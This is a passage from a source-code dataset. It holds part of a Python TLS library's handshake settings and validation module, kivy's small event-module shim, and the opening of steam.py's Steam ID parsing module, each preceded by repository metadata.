"aes256ccm", "aes128ccm",
"aes256", "aes128",
"3des"]
ALL_CIPHER_NAMES = CIPHER_NAMES + ["chacha20-poly1305_draft00",
"aes128ccm_8", "aes256ccm_8",
"rc4", "null"]
# Don't allow "md5" by default
MAC_NAMES = ["sha", "sha256", "sha384", "aead"]
ALL_MAC_NAMES = MAC_NAMES + ["md5"]
KEY_EXCHANGE_NAMES = ["ecdhe_ecdsa", "rsa", "dhe_rsa", "ecdhe_rsa", "srp_sha",
"srp_sha_rsa", "ecdh_anon", "dh_anon", "dhe_dsa"]
CIPHER_IMPLEMENTATIONS = ["openssl", "pycrypto", "python"]
CERTIFICATE_TYPES = ["x509"]
RSA_SIGNATURE_HASHES = ["sha512", "sha384", "sha256", "sha224", "sha1"]
DSA_SIGNATURE_HASHES = ["sha512", "sha384", "sha256", "sha224", "sha1"]
ECDSA_SIGNATURE_HASHES = ["sha512", "sha384", "sha256", "sha224", "sha1"]
ALL_RSA_SIGNATURE_HASHES = RSA_SIGNATURE_HASHES + ["md5"]
SIGNATURE_SCHEMES = ["Ed25519", "Ed448"]
RSA_SCHEMES = ["pss", "pkcs1"]
# while secp521r1 is the most secure, it's also much slower than the others
# so place it as the last one
CURVE_NAMES = ["x25519", "x448", "secp384r1", "secp256r1",
"secp521r1"]
ALL_CURVE_NAMES = CURVE_NAMES + ["secp256k1", "brainpoolP512r1",
"brainpoolP384r1", "brainpoolP256r1"]
if ecdsaAllCurves:
ALL_CURVE_NAMES += ["secp224r1", "secp192r1"]
ALL_DH_GROUP_NAMES = ["ffdhe2048", "ffdhe3072", "ffdhe4096", "ffdhe6144",
"ffdhe8192"]
CURVE_ALIASES = {"secp256r1": ('NIST256p', 'prime256v1', 'P-256'),
"secp384r1": ('NIST384p', 'P-384'),
"secp521r1": ('NIST521p', 'P-521'),
"secp256k1": ('SECP256k1',),
"secp192r1": ('NIST192p', 'P-192'),
"secp224r1": ('NIST224p', 'P-224'),
"brainpoolP256r1": ('BRAINPOOLP256r1',),
"brainpoolP384r1": ('BRAINPOOLP384r1',),
"brainpoolP512r1": ('BRAINPOOLP512r1',)}
# list of supported groups in TLS 1.3 as per RFC 8446, chapter 4.2.7. (excluding private use here)
TLS13_PERMITTED_GROUPS = ["secp256r1", "secp384r1", "secp521r1",
"x25519", "x448", "ffdhe2048",
"ffdhe3072", "ffdhe4096", "ffdhe6144",
"ffdhe8192"]
KNOWN_VERSIONS = ((3, 0), (3, 1), (3, 2), (3, 3), (3, 4))
TICKET_CIPHERS = ["chacha20-poly1305", "aes256gcm", "aes128gcm", "aes128ccm",
"aes128ccm_8", "aes256ccm", "aes256ccm_8"]
PSK_MODES = ["psk_dhe_ke", "psk_ke"]
class Keypair(object):
"""
Key, certificate and related data.
Stores also certificate associate data like OCSPs and transparency info.
TODO: add the above
First certificate in certificates needs to match key, remaining should
build a trust path to a root CA.
:vartype key: RSAKey or ECDSAKey
:ivar key: private key
:vartype certificates: list(X509)
:ivar certificates: the certificates to send to peer if the key is selected
for use. The first one MUST include the public key of the ``key``
"""
def __init__(self, key=None, certificates=tuple()):
self.key = key
self.certificates = certificates
def validate(self):
"""Sanity check the keypair."""
if not self.key or not self.certificates:
raise ValueError("Key or certificate missing in Keypair")
class VirtualHost(object):
"""
Configuration of keys and certs for a single virual server.
This class encapsulates keys and certificates for hosts specified by
server_name (SNI) and ALPN extensions.
TODO: support SRP as alternative to certificates
TODO: support PSK as alternative to certificates
:vartype keys: list(Keypair)
:ivar keys: List of certificates and keys to be used in this
virtual host. First keypair able to server ClientHello will be used.
:vartype hostnames: set(bytes)
:ivar hostnames: all the hostnames that server supports
please use :py:meth:`matches_hostname` to verify if the VirtualHost
can serve a request to a given hostname as that allows wildcard hosts
that always reply True.
:vartype trust_anchors: list(X509)
:ivar trust_anchors: list of CA certificates supported for client
certificate authentication, sent in CertificateRequest
:ivar list(bytes) app_protocols: all the application protocols that the
server supports (for ALPN)
"""
def __init__(self):
"""Set up default configuration."""
self.keys = []
self.hostnames = set()
self.trust_anchors = []
self.app_protocols = []
def matches_hostname(self, hostname):
"""Checks if the virtual host can serve hostname"""
return hostname in self.hostnames
def validate(self):
"""Sanity check the settings"""
if not self.keys:
raise ValueError("Virtual host missing keys")
for i in self.keys:
i.validate()
class HandshakeSettings(object):
"""
This class encapsulates various parameters that can be used with
a TLS handshake.
:vartype minKeySize: int
:ivar minKeySize: The minimum bit length for asymmetric keys.
If the other party tries to use SRP, RSA, DSA, or Diffie-Hellman
parameters smaller than this length, an alert will be
signalled. The default is 1023.
:vartype maxKeySize: int
:ivar maxKeySize: The maximum bit length for asymmetric keys.
If the other party tries to use SRP, RSA, DSA, or Diffie-Hellman
parameters larger than this length, an alert will be signalled.
The default is 8193.
:vartype cipherNames: list(str)
:ivar cipherNames: The allowed ciphers.
The allowed values in this list are 'chacha20-poly1305', 'aes256gcm',
'aes128gcm', 'aes256', 'aes128', '3des', 'chacha20-poly1305_draft00',
'null' and
'rc4'. If these settings are used with a client handshake, they
determine the order of the ciphersuites offered in the ClientHello
message.
If these settings are used with a server handshake, the server will
choose whichever ciphersuite matches the earliest entry in this
list.
The default value is list that excludes 'rc4', 'null' and
'chacha20-poly1305_draft00'.
:vartype macNames: list(str)
:ivar macNames: The allowed MAC algorithms.
The allowed values in this list are 'sha384', 'sha256', 'aead', 'sha'
and 'md5'.
The default value is list that excludes 'md5'.
:vartype certificateTypes: list(str)
:ivar certificateTypes: The allowed certificate types.
The only allowed certificate type is 'x509'. This list is only used
with a
client handshake. The client will advertise to the server which
certificate
types are supported, and will check that the server uses one of the
appropriate types.
:vartype minVersion: tuple
:ivar minVersion: The minimum allowed SSL/TLS version.
This variable can be set to (3, 0) for SSL 3.0, (3, 1) for TLS 1.0,
(3, 2) for
TLS 1.1, or (3, 3) for TLS 1.2. If the other party wishes to use a
lower
version, a protocol_version alert will be signalled. The default is
(3, 1).
:vartype maxVersion: tuple
:ivar maxVersion: The maximum allowed SSL/TLS version.
This variable can be set to (3, 0) for SSL 3.0, (3, 1) for TLS 1.0,
(3, 2) for TLS 1.1, or (3, 3) for TLS 1.2. If the other party wishes
to use a
higher version, a protocol_version alert will be signalled. The
default is (3, 3).
.. warning:: Some servers may (improperly) reject clients which offer
support
for TLS 1.1 or higher. In this case, try lowering maxVersion to
(3, 1).
:vartype useExperimentalTackExtension: bool
:ivar useExperimentalTackExtension: Whether to enabled TACK support.
Note that TACK support is not standardized by IETF and uses a temporary
TLS Extension number, so should NOT be used in production software.
:vartype sendFallbackSCSV: bool
:ivar sendFallbackSCSV: Whether to, as a client, send FALLBACK_SCSV.
:vartype rsaSigHashes: list(str)
:ivar rsaSigHashes: List of hashes supported (and advertised as such) for
TLS 1.2 signatures over Server Key Exchange or Certificate Verify with
RSA signature algorithm.
The list is sorted from most wanted to least wanted algorithm.
The allowed hashes are: "md5", "sha1", "sha224", "sha256",
"sha384" and "sha512". The default list does not include md5.
:vartype dsaSigHashes: list(str)
:ivar dsaSigHashes: List of hashes supported (and advertised as such) for
TLS 1.2 signatures over Server Key Exchange or Certificate Verify with
DSA signature algorithm.
The list is sorted from most wanted to least wanted algorithm.
The allowed hashes are: "sha1", "sha224", "sha256",
"sha384" and "sha512".
:vartype ecdsaSigHashes: list(str)
:ivar ecdsaSigHashes: List of hashes supported (and advertised as such) for
TLS 1.2 signatures over Server Key Exchange or Certificate Verify with
ECDSA signature algorithm.
The list is sorted from most wanted to least wanted algorithm.
The allowed hashes are: "sha1", "sha224", "sha256",
"sha384" and "sha512".
"vartype more_sig_schemes: list(str)
:ivar more_sig_schemes: List of additional signatures schemes (ones
that don't use RSA-PKCS#1 v1.5, RSA-PSS, DSA, or ECDSA) to advertise
as supported.
Currently supported are: "Ed25519", and "Ed448".
:vartype eccCurves: list(str)
:ivar eccCurves: List of named curves that are to be advertised as
supported in supported_groups extension.
:vartype useEncryptThenMAC: bool
:ivar useEncryptThenMAC: whether to support the encrypt then MAC extension
from RFC 7366. True by default.
:vartype useExtendedMasterSecret: bool
:ivar useExtendedMasterSecret: whether to support the extended master
secret calculation from RFC 7627. True by default.
:vartype requireExtendedMasterSecret: bool
:ivar requireExtendedMasterSecret: whether to require negotiation of
extended master secret calculation for successful connection. Requires
useExtendedMasterSecret to be set to true. False by default.
:vartype defaultCurve: str
:ivar defaultCurve: curve that will be used by server in case the client
did not advertise support for any curves. It does not have to be the
first curve for eccCurves and may be distinct from curves from that
list.
:vartype keyShares: list(str)
:ivar keyShares: list of TLS 1.3 key shares to include in Client Hello
:vartype padding_cb: func
:ivar padding_cb: Callback to function computing number of padding bytes
for TLS 1.3. Signature is cb_func(msg_size, content_type, max_size).
:vartype pskConfigs: list(tuple(bytearray, bytearray, bytearray))
:ivar pskConfigs: list of tuples, first element of the tuple is the
human readable, UTF-8 encoded, "identity" of the associated secret
(bytearray, can be empty for TLS 1.2 and earlier), second element is
the binary secret (bytearray), third is an optional parameter
specifying the PRF hash to be used in TLS 1.3 (``sha256`` or
``sha384``)
:vartype ticketKeys: list(bytearray)
:ivar ticketKeys: keys to be used for encrypting and decrypting session
tickets. First entry is the encryption key for new tickets and the
default decryption key, subsequent entries are the fallback keys
allowing for key rollover. The keys need to be of size appropriate
for a selected cipher in ticketCipher, 32 bytes for 'aes256gcm' and
'chacha20-poly1305', 16 bytes for 'aes128-gcm'.
New keys should be generated regularly and replace old ones. Key use
time should generally not be longer than 24h and key life-time should
not be longer than 48h.
Leave empty to disable session ticket support on server side.
:vartype ticketCipher: str
:ivar ticketCipher: name of the cipher used for encrypting the session
tickets. 'aes256gcm' by default, 'aes128gcm' or 'chacha20-poly1305'
alternatively.
:vartype ticketLifetime: int
:ivar ticketLifetime: maximum allowed lifetime of ticket encryption key,
in seconds. 1 day by default
:vartype psk_modes: list(str)
:ivar psk_modes: acceptable modes for the PSK key exchange in TLS 1.3
:ivar int max_early_data: maximum number of bytes acceptable for 0-RTT
early_data processing. In other words, how many bytes will the server
try to process, but ignore, in case the Client Hello includes
early_data extension.
:vartype use_heartbeat_extension: bool
:ivar use_heartbeat_extension: whether to support heartbeat extension from
RFC 6520. True by default.
:vartype heartbeat_response_callback: func
:ivar heartbeat_response_callback: Callback to function when Heartbeat
response is received.
:vartype ~.record_size_limit: int
:ivar ~.record_size_limit: maximum size of records we are willing to process
(value advertised to the other side). It must not be larger than
2**14+1 (the maximum for TLS 1.3) and will be reduced to 2**14 if TLS
1.2 or lower is the highest enabled version. Must not be set to values
smaller than 64. Set to None to disable support for the extension.
See also: RFC 8449.
:vartype keyExchangeNames: list
:ivar keyExchangeNames: Enabled key exchange types for the connection,
influences selected cipher suites.
"""
def _init_key_settings(self):
"""Create default variables for key-related settings."""
self.minKeySize = 1023
self.maxKeySize = 8193
self.rsaSigHashes = list(RSA_SIGNATURE_HASHES)
self.rsaSchemes = list(RSA_SCHEMES)
self.dsaSigHashes = list(DSA_SIGNATURE_HASHES)
self.virtual_hosts = []
# DH key settings
self.eccCurves = list(CURVE_NAMES)
self.dhParams = None
self.dhGroups = list(ALL_DH_GROUP_NAMES)
self.defaultCurve = "secp256r1"
self.keyShares = ["secp256r1", "x25519"]
self.padding_cb = None
self.use_heartbeat_extension = True
self.heartbeat_response_callback = None
def _init_misc_extensions(self):
"""Default variables for assorted extensions."""
self.certificateTypes = list(CERTIFICATE_TYPES)
self.useExperimentalTackExtension = False
self.sendFallbackSCSV = False
self.useEncryptThenMAC = True
self.ecdsaSigHashes = list(ECDSA_SIGNATURE_HASHES)
self.more_sig_schemes = list(SIGNATURE_SCHEMES)
self.usePaddingExtension = True
self.useExtendedMasterSecret = True
self.requireExtendedMasterSecret = False
# PSKs
self.pskConfigs = []
self.psk_modes = list(PSK_MODES)
# session tickets
self.ticketKeys = []
self.ticketCipher = "aes256gcm"
self.ticketLifetime = 24 * 60 * 60
self.max_early_data = 2 ** 14 + 16 # full record + tag
# send two tickets so that client can quickly ramp up number of
# resumed connections (as tickets are single-use in TLS 1.3
self.ticket_count = 2
self.record_size_limit = 2**14 + 1 # TLS 1.3 includes content type
def __init__(self):
"""Initialise default values for settings."""
self._init_key_settings()
self._init_misc_extensions()
self.minVersion = (3, 1)
self.maxVersion = (3, 4)
self.versions = [(3, 4), (3, 3), (3, 2), (3, 1)]
self.cipherNames = list(CIPHER_NAMES)
self.macNames = list(MAC_NAMES)
self.keyExchangeNames = list(KEY_EXCHANGE_NAMES)
self.cipherImplementations = list(CIPHER_IMPLEMENTATIONS)
@staticmethod
def _sanityCheckKeySizes(other):
"""Check if key size limits are sane"""
if other.minKeySize < 512:
raise ValueError("minKeySize too small")
if other.minKeySize > 16384:
raise ValueError("minKeySize too large")
if other.maxKeySize < 512:
raise ValueError("maxKeySize too small")
if other.maxKeySize > 16384:
raise ValueError("maxKeySize too large")
if other.maxKeySize < other.minKeySize:
raise ValueError("maxKeySize smaller than minKeySize")
# check also keys of virtual hosts
for i in other.virtual_hosts:
i.validate()
@staticmethod
def _not_matching(values, sieve):
"""Return list of items from values that are not in sieve."""
return [val for val in values if val not in sieve]
@staticmethod
def _sanityCheckCipherSettings(other):
"""Check if specified cipher settings are known."""
not_matching = HandshakeSettings._not_matching
unknownCiph = not_matching(other.cipherNames, ALL_CIPHER_NAMES)
if unknownCiph:
raise ValueError("Unknown cipher name: {0}".format(unknownCiph))
unknownMac = not_matching(other.macNames, ALL_MAC_NAMES)
if unknownMac:
raise ValueError("Unknown MAC name: {0}".format(unknownMac))
unknownKex = not_matching(other.keyExchangeNames, KEY_EXCHANGE_NAMES)
if unknownKex:
raise ValueError("Unknown key exchange name: {0}"
.format(unknownKex))
unknownImpl = not_matching(other.cipherImplementations,
CIPHER_IMPLEMENTATIONS)
if unknownImpl:
raise ValueError("Unknown cipher implementation: {0}"
.format(unknownImpl))
@staticmethod
def _sanityCheckECDHSettings(other):
"""Check ECDHE settings if they are sane."""
not_matching = HandshakeSettings._not_matching
unknownCurve = not_matching(other.eccCurves, ALL_CURVE_NAMES)
if unknownCurve:
raise ValueError("Unknown ECC Curve name: {0}"
.format(unknownCurve))
if other.defaultCurve not in ALL_CURVE_NAMES:
raise ValueError("Unknown default ECC Curve name: {0}"
.format(other.defaultCurve))
nonAdvertisedGroup = [val for val in other.keyShares
if val not in other.eccCurves and
val not in other.dhGroups]
if nonAdvertisedGroup:
raise ValueError("Key shares for not enabled groups specified: {0}"
.format(nonAdvertisedGroup))
unknownSigHash = not_matching(other.ecdsaSigHashes,
ECDSA_SIGNATURE_HASHES)
if unknownSigHash:
raise ValueError("Unknown ECDSA signature hash: '{0}'".\
format(unknownSigHash))
unknownSigHash = not_matching(other.more_sig_schemes,
SIGNATURE_SCHEMES)
if unknownSigHash:
raise ValueError("Unkonwn more_sig_schemes specified: '{0}'"
.format(unknownSigHash))
unknownDHGroup = not_matching(other.dhGroups, ALL_DH_GROUP_NAMES)
if unknownDHGroup:
raise ValueError("Unknown FFDHE group name: '{0}'"
.format(unknownDHGroup))
# TLS 1.3 limits the allowed groups (RFC 8446,ch. 4.2.7.)
if other.maxVersion == (3, 4):
forbiddenGroup = HandshakeSettings._not_matching(other.eccCurves, TLS13_PERMITTED_GROUPS)
if forbiddenGroup:
raise ValueError("The following enabled groups are forbidden in TLS 1.3: {0}"
.format(forbiddenGroup))
@staticmethod
def _sanityCheckDHSettings(other):
"""Check if (EC)DHE settings are sane."""
not_matching = HandshakeSettings._not_matching
HandshakeSettings._sanityCheckECDHSettings(other)
unknownKeyShare = [val for val in other.keyShares
if val not in ALL_DH_GROUP_NAMES and
val not in ALL_CURVE_NAMES]
if unknownKeyShare:
raise ValueError("Unknown key share: '{0}'"
.format(unknownKeyShare))
if other.dhParams and (len(other.dhParams) != 2 or
not isinstance(other.dhParams[0], int_types) or
not isinstance(other.dhParams[1], int_types)):
raise ValueError("DH parameters need to be a tuple of integers")
@staticmethod
def _sanityCheckPrimitivesNames(other):
"""Check if specified cryptographic primitive names are known"""
HandshakeSettings._sanityCheckCipherSettings(other)
HandshakeSettings._sanityCheckDHSettings(other)
not_matching = HandshakeSettings._not_matching
unknownType = not_matching(other.certificateTypes, CERTIFICATE_TYPES)
if unknownType:
raise ValueError("Unknown certificate type: {0}"
.format(unknownType))
unknownSigHash = not_matching(other.rsaSigHashes,
ALL_RSA_SIGNATURE_HASHES)
if unknownSigHash:
raise ValueError("Unknown RSA signature hash: '{0}'"
.format(unknownSigHash))
unknownRSAPad = not_matching(other.rsaSchemes, RSA_SCHEMES)
if unknownRSAPad:
raise ValueError("Unknown RSA padding mode: '{0}'"
.format(unknownRSAPad))
unknownSigHash = not_matching(other.dsaSigHashes,
DSA_SIGNATURE_HASHES)
if unknownSigHash:
raise ValueError("Unknown DSA signature hash: '{0}'"
.format(unknownSigHash))
if not other.rsaSigHashes and not other.ecdsaSigHashes and \
not other.dsaSigHashes and not other.more_sig_schemes and \
other.maxVersion >= (3, 3):
raise ValueError("TLS 1.2 requires signature algorithms to be set")
@staticmethod
def _sanityCheckProtocolVersions(other):
"""Check if set protocol version are sane"""
if other.minVersion > other.maxVersion:
raise ValueError("Versions set incorrectly")
if other.minVersion not in KNOWN_VERSIONS:
raise ValueError("minVersion set incorrectly")
if other.maxVersion not in KNOWN_VERSIONS:
raise ValueError("maxVersion set incorrectly")
if other.maxVersion < (3, 4):
other.versions = [i for i in other.versions if i < (3, 4)]
@staticmethod
def _sanityCheckEMSExtension(other):
"""Check if settings for EMS are sane."""
if other.useExtendedMasterSecret not in (True, False):
raise ValueError("useExtendedMasterSecret must be True or False")
if other.requireExtendedMasterSecret not in (True, False):
raise ValueError("requireExtendedMasterSecret must be True "
"or False")
if other.requireExtendedMasterSecret and \
not other.useExtendedMasterSecret:
raise ValueError("requireExtendedMasterSecret requires "
"useExtendedMasterSecret")
@staticmethod
def _sanityCheckExtensions(other):
"""Check if set extension settings are sane"""
if other.useEncryptThenMAC not in (True, False):
raise ValueError("useEncryptThenMAC can only be True or False")
if other.usePaddingExtension not in (True, False):
raise ValueError("usePaddingExtension must be True or False")
if other.use_heartbeat_extension not in (True, False):
raise ValueError("use_heartbeat_extension must be True or False")
if other.heartbeat_response_callback and not other.use_heartbeat_extension:
raise ValueError("heartbeat_response_callback requires "
"use_heartbeat_extension")
if other.record_size_limit is not None and \
not 64 <= other.record_size_limit <= 2**14 + 1:
raise ValueError("record_size_limit cannot exceed 2**14+1 bytes")
HandshakeSettings._sanityCheckEMSExtension(other)
@staticmethod
def _not_allowed_len(values, sieve):
"""Return True if length of any item in values is not in sieve."""
sieve = set(sieve)
return any(len(i) not in sieve for i in values)
@staticmethod
def _sanityCheckPsks(other):
"""Check if the set PSKs are sane."""
if HandshakeSettings._not_allowed_len(other.pskConfigs, [2, 3]):
raise ValueError("pskConfigs items must be a 2 or 3-element"
"tuples")
badHashes = [i[2] for i in other.pskConfigs if
len(i) == 3 and i[2] not in set(['sha256', 'sha384'])]
if badHashes:
raise ValueError("pskConfigs include invalid hash specifications: "
"{0}".format(badHashes))
bad_psk_modes = [i for i in other.psk_modes if
i not in PSK_MODES]
if bad_psk_modes:
raise ValueError("psk_modes includes invalid key exchange modes: "
"{0}".format(bad_psk_modes))
@staticmethod
def _sanityCheckTicketSettings(other):
"""Check if the session ticket settings are sane."""
if other.ticketCipher not in TICKET_CIPHERS:
raise ValueError("Invalid cipher for session ticket encryption: "
"{0}".format(other.ticketCipher))
if HandshakeSettings._not_allowed_len(other.ticketKeys, [16, 32]):
raise ValueError("Session ticket encryption keys must be 16 or 32"
"bytes long")
if not 0 < other.ticketLifetime <= 7 * 24 * 60 * 60:
raise ValueError("Ticket lifetime must be a positive integer "
"smaller or equal 604800 (7 days)")
# while not ticket setting per-se, it is related to session tickets
if not 0 < other.max_early_data <= 2**64:
raise ValueError("max_early_data must be between 0 and 2GiB")
if not 0 <= other.ticket_count < 2**16:
raise ValueError("Incorrect amount for number of new session "
"tickets to send")
def _copy_cipher_settings(self, other):
"""Copy values related to cipher selection."""
other.cipherNames = self.cipherNames
other.macNames = self.macNames
other.keyExchangeNames = self.keyExchangeNames
other.cipherImplementations = self.cipherImplementations
other.minVersion = self.minVersion
other.maxVersion = self.maxVersion
other.versions = self.versions
def _copy_extension_settings(self, other):
"""Copy values of settings related to extensions."""
other.useExtendedMasterSecret = self.useExtendedMasterSecret
other.requireExtendedMasterSecret = self.requireExtendedMasterSecret
other.useExperimentalTackExtension = self.useExperimentalTackExtension
other.sendFallbackSCSV = self.sendFallbackSCSV
other.useEncryptThenMAC = self.useEncryptThenMAC
other.usePaddingExtension = self.usePaddingExtension
# session tickets
other.padding_cb = self.padding_cb
other.ticketKeys = self.ticketKeys
other.ticketCipher = self.ticketCipher
other.ticketLifetime = self.ticketLifetime
other.max_early_data = self.max_early_data
other.ticket_count = self.ticket_count
other.record_size_limit = self.record_size_limit
@staticmethod
def _remove_all_matches(values, needle):
"""Remove all instances of needle from values."""
values[:] = (i for i in values if i != needle)
def _sanity_check_ciphers(self, other):
"""Remove unsupported ciphers in current configuration."""
if not cipherfactory.tripleDESPresent:
other.cipherNames = other.cipherNames[:]
self._remove_all_matches(other.cipherNames, "3des")
if not other.cipherNames:
raise ValueError("No supported ciphers")
def _sanity_check_implementations(self, other):
"""Remove all backends that are not loaded."""
if not cryptomath.m2cryptoLoaded:
self._remove_all_matches(other.cipherImplementations, "openssl")
if not cryptomath.pycryptoLoaded:
self._remove_all_matches(other.cipherImplementations, "pycrypto")
if not other.cipherImplementations:
raise ValueError("No supported cipher implementations")
def _copy_key_settings(self, other):
"""Copy key-related settings."""
other.minKeySize = self.minKeySize
other.maxKeySize = self.maxKeySize
other.certificateTypes = self.certificateTypes
other.rsaSigHashes = self.rsaSigHashes
other.rsaSchemes = self.rsaSchemes
other.dsaSigHashes = self.dsaSigHashes
other.ecdsaSigHashes = self.ecdsaSigHashes
other.more_sig_schemes = self.more_sig_schemes
other.virtual_hosts = self.virtual_hosts
# DH key params
other.eccCurves = self.eccCurves
other.dhParams = self.dhParams
other.dhGroups = self.dhGroups
other.defaultCurve = self.defaultCurve
other.keyShares = self.keyShares
other.use_heartbeat_extension = self.use_heartbeat_extension
other.heartbeat_response_callback = self.heartbeat_response_callback
def validate(self):
"""
Validate the settings, filter out unsupported ciphersuites and return
a copy of object. Does not modify the original object.
:rtype: HandshakeSettings
:returns: a self-consistent copy of settings
:raises ValueError: when settings are invalid, insecure or unsupported.
"""
other = HandshakeSettings()
self._copy_cipher_settings(other)
self._copy_extension_settings(other)
self._copy_key_settings(other)
other.pskConfigs = self.pskConfigs
other.psk_modes = self.psk_modes
if not other.certificateTypes:
raise ValueError("No supported certificate types")
self._sanityCheckKeySizes(other)
self._sanityCheckPrimitivesNames(other)
self._sanityCheckProtocolVersions(other)
self._sanityCheckExtensions(other)
if other.maxVersion < (3, 3):
# No sha-2 and AEAD pre TLS 1.2
other.macNames = [e for e in self.macNames if
e == "sha" or e == "md5"]
self._sanityCheckPsks(other)
self._sanityCheckTicketSettings(other)
self._sanity_check_implementations(other)
self._sanity_check_ciphers(other)
return other
def getCertificateTypes(self):
"""Get list of certificate types as IDs"""
ret = []
for ct in self.certificateTypes:
if ct == "x509":
ret.append(CertificateType.x509)
else:
raise AssertionError()
return ret
|
52a09203d07b63cd73f31653ad3e4a2de27b3f70
|
48d1002394d233cf5932c7ef69300400af79118a
|
/kivy/event.py
|
52f352c59d55b76e48209fffbac3d00458b6c727
|
[
"LGPL-2.1-only",
"MIT",
"Apache-2.0"
] |
permissive
|
kivy/kivy
|
ba2668bffe4e125fd1c5aace54f671343802850e
|
ca1b918c656f23e401707388f25f4a63d9b8ae7d
|
refs/heads/master
| 2023-09-04T02:27:05.311875
| 2023-08-26T08:00:20
| 2023-08-26T08:00:20
| 1,049,095
| 16,076
| 4,161
|
MIT
| 2023-09-09T07:55:18
| 2010-11-03T20:27:32
|
Python
|
UTF-8
|
Python
| false
| false
| 555
|
py
|
event.py
|
# This is a "jumping" module, required for python-for-android project
# Because we are putting all the module into the same .so, there can be name
# conflict. We have one conflict with pygame.event and kivy.event => Both are
# python extension and have the same "initevent" symbol. So right now, just
# rename this one.
__all__ = ('EventDispatcher', 'ObjectWithUid', 'Observable')
import kivy._event
__doc__ = kivy._event.__doc__
EventDispatcher = kivy._event.EventDispatcher
ObjectWithUid = kivy._event.ObjectWithUid
Observable = kivy._event.Observable
|
1732da5c5de2be0b45a39be9d08ca45300685c38
|
c07074638db53fbfd31ee761e243b970664c0646
|
/steam/id.py
|
83fbeb0bdc217738b8c0eaa379e8fb60db04f534
|
[
"MIT"
] |
permissive
|
Gobot1234/steam.py
|
4bdd66004d29b0283fb150a2eb910915dbf1d878
|
3075c6065babcd8a67052593d4b31d10c20edabe
|
refs/heads/main
| 2023-08-30T03:59:06.001118
| 2023-08-28T14:18:46
| 2023-08-28T14:18:53
| 233,127,732
| 144
| 40
|
NOASSERTION
| 2023-09-14T13:38:41
| 2020-01-10T20:47:06
|
Python
|
UTF-8
|
Python
| false
| false
| 18,424
|
py
|
id.py
|
"""Licensed under The MIT License (MIT) - Copyright (c) 2020-present James H-B. See LICENSE"""
from __future__ import annotations
import abc
import re
from collections.abc import Callable
from contextlib import nullcontext
from types import GenericAlias
from typing import TYPE_CHECKING, Final, Generic, Literal, cast
import aiohttp
from typing_extensions import TypeVar
from ._const import JSON_LOADS, URL
from .enums import Instance, Type, TypeChar, Universe
from .errors import InvalidID
from .types.id import ID32, ID64, Intable
if TYPE_CHECKING:
from aiohttp import ClientSession
from .types.http import StrOrURL
from .types.user import IndividualID
__all__ = ("ID",)
def parse_id64(
id: Intable,
/,
*,
type: Type | None = None,
universe: Universe | None = None,
instance: Instance | None = None,
) -> ID64:
"""Convert various representations of Steam IDs to its Steam 64-bit ID.
Parameters
----------
id
The ID to convert.
type
The type of the ID.
universe
The universe of the ID.
instance
The instance of the ID.
Examples
--------
.. code:: python
parse_id64(12345)
parse_id64("12345") # account ids
parse_id64(12345, type=steam.Type.Clan) # makes what would be interpreted as a user id into a clan id64
parse_id64(103582791429521412)
parse_id64("103582791429521412") # id64s
parse_id64("STEAM_1:0:2") # id2
parse_id64("[g:1:4]") # id3
Raises
------
:exc:`.InvalidID`
The created 64-bit Steam ID would be invalid.
Returns
-------
The 64-bit Steam ID.
"""
if not id and type is None and universe is None and instance is None:
return ID64(0)
try:
id = int(id)
except ValueError:
# textual input e.g. [g:1:4]
if not isinstance(id, str):
raise InvalidID(id, type, universe, instance, "it cannot be parsed as an int or str") from None
result = ID.from_id2(id) or ID.from_id3(id) or ID.from_invite_code(id)
if result is None:
raise InvalidID(id, type, universe, instance, "it cannot be parsed") from None
return result.id64
else:
# numeric input
if 0 <= id < 2**32: # 32 bit
type = type or Type.Individual
universe = universe or Universe.Public
if instance is None:
instance = Instance.Desktop if type in (Type.Individual, Type.GameServer) else Instance.All
if not (0 <= universe < 1 << 8):
raise InvalidID(id, type, universe, instance, "universe is bigger than 8 bits")
if not (0 <= type < 1 << 4):
raise InvalidID(id, type, universe, instance, "type is bigger than 4 bits")
if not (0 <= instance < 1 << 20):
raise InvalidID(id, type, universe, instance, "instance is bigger than 20 bits")
elif 0 <= id < 2**64: # 64 bit
universe = Universe.try_value((id >> 56) & 0xFF)
type = Type.try_value((id >> 52) & 0xF)
instance = Instance.try_value((id >> 32) & 0xFFFFF)
id &= 0xFFFFFFFF
else:
raise InvalidID(id, type, universe, instance, f"it is too {'large' if id >= 2**64 else 'small'}")
return ID64(universe << 56 | type << 52 | instance << 32 | id)
ID2_REGEX = re.compile(r"STEAM_(?P<universe>\d+):(?P<remainder>[0-1]):(?P<id>\d{1,10})")
ID3_REGEX = re.compile(
(
rf"\[(?P<type>[i{''.join(TypeChar._member_map_)}]):"
rf"(?P<universe>[{min(Universe).value}-{max(Universe).value}]):"
r"(?P<id>[0-9]{1,10})"
r"(:(?P<instance>\d+))?]"
)
)
_INVITE_HEX = "0123456789abcdef"
_INVITE_CUSTOM = "bcdfghjkmnpqrtvw"
_INVITE_VALID = f"{_INVITE_HEX}{_INVITE_CUSTOM}"
_URL_START = r"(?:https?://)?(?:www\.)?"
INVITE_REGEX = re.compile(rf"(?:{_URL_START}(?:s\.team/p/))?(?P<code>[\-{_INVITE_VALID}]{{1,8}})")
def _invite_custom_sub(
s: str,
repl: Callable[[re.Match[str]], str] = lambda m, map=dict(zip(_INVITE_CUSTOM, _INVITE_HEX)): map[m.group()],
pattern: re.Pattern[str] = re.compile(f"[{_INVITE_CUSTOM}]"),
/,
) -> str:
return pattern.sub(repl, s)
def _invite_hex_sub(
s: str,
repl: Callable[[re.Match[str]], str] = lambda m, map=dict(zip(_INVITE_HEX, _INVITE_CUSTOM)): map[m.group()],
pattern: re.Pattern[str] = re.compile(f"[{_INVITE_HEX}]"),
/,
) -> str:
return pattern.sub(repl, s)
USER_URL_PATHS = frozenset({"id", "profiles", "user"})
CLAN_URL_PATHS = frozenset({"gid", "groups", "app", "games"})
URL_REGEX = re.compile(
rf"{_URL_START}(?P<clean_url>steamcommunity\.com/(?P<type>{'|'.join(USER_URL_PATHS | CLAN_URL_PATHS)})/(?P<value>.+))"
)
USER_ID64_FROM_URL_REGEX = re.compile(r"g_rgProfileData\s*=\s*(?P<json>{.*?});\s*")
CLAN_ID64_FROM_URL_REGEX = re.compile(r"OpenGroupChat\(\s*'(?P<steamid>\d+)'\s*\)")
async def id64_from_url(url: StrOrURL, /, session: aiohttp.ClientSession | None = None) -> ID64 | None:
"""Takes a Steam Community url and returns 64-bit Steam ID or ``None``.
Notes
-----
- Each call makes a http request to https://steamcommunity.com.
- Example URLs:
https://steamcommunity.com/gid/[g:1:4]
https://steamcommunity.com/gid/103582791429521412
https://steamcommunity.com/groups/Valve
